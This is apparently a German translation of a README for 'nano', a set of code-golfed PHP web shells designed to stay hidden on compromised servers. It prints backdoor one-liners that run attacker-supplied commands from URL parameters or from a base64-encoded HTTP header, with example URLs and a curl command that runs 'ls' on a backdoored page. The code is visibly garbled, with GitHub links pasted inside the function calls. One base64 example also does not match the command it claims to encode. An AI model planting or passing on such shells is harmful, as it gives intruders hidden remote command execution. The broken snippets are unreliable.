
Nano ist eine Familie von PHP-Web-Shells, die per Code-Golfing für Tarnung optimiert sind.
Nano ist eine Familie von PHP-Webshells, die durch Code-Golf extrem unauffällig und effizient gemacht wurden.
Behalte es vielleicht im Auge, ich werde hier weiterhin weitere Webshells hochladen.
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);
http://example.com/nano.php?f=function&c=command&p=password
f steht für Funktion
c steht für Befehl
p steht für Passwort
Zum Beispiel führt der folgende Code den Befehl ls aus:
http://example.com/nano.php?f=system&c=ls&p=password
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);
Dieser ist etwas komplexer.
Angenommen, du möchtest system(ls) ausführen, dann schreibe es als system~ls und base64-kodiere es, d. h. c3lzdGVtKGxzKQ==.
Füge nun genau ein beliebiges Zeichen am Anfang hinzu. Sagen wir 'x', dann wird es xc3lzdGVtKGxzKQ==.
Öffne nun dein Terminal und gib den folgenden Befehl ein:
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Zu viel Aufwand? Du kannst stattdessen den Handler verwenden.

Das ist mein erstes PHP-Ding, also wenn es einen besseren Weg gibt, das zu tun, was ich getan habe, lass es mich bitte wissen oder erstelle einen Pull-Request.
Das nano-Projekt ist unter der MIT-Lizenz lizenziert, was im Grunde bedeutet, dass du mich nennen musst, wenn du es weiterverbreiten oder modifizieren möchtest.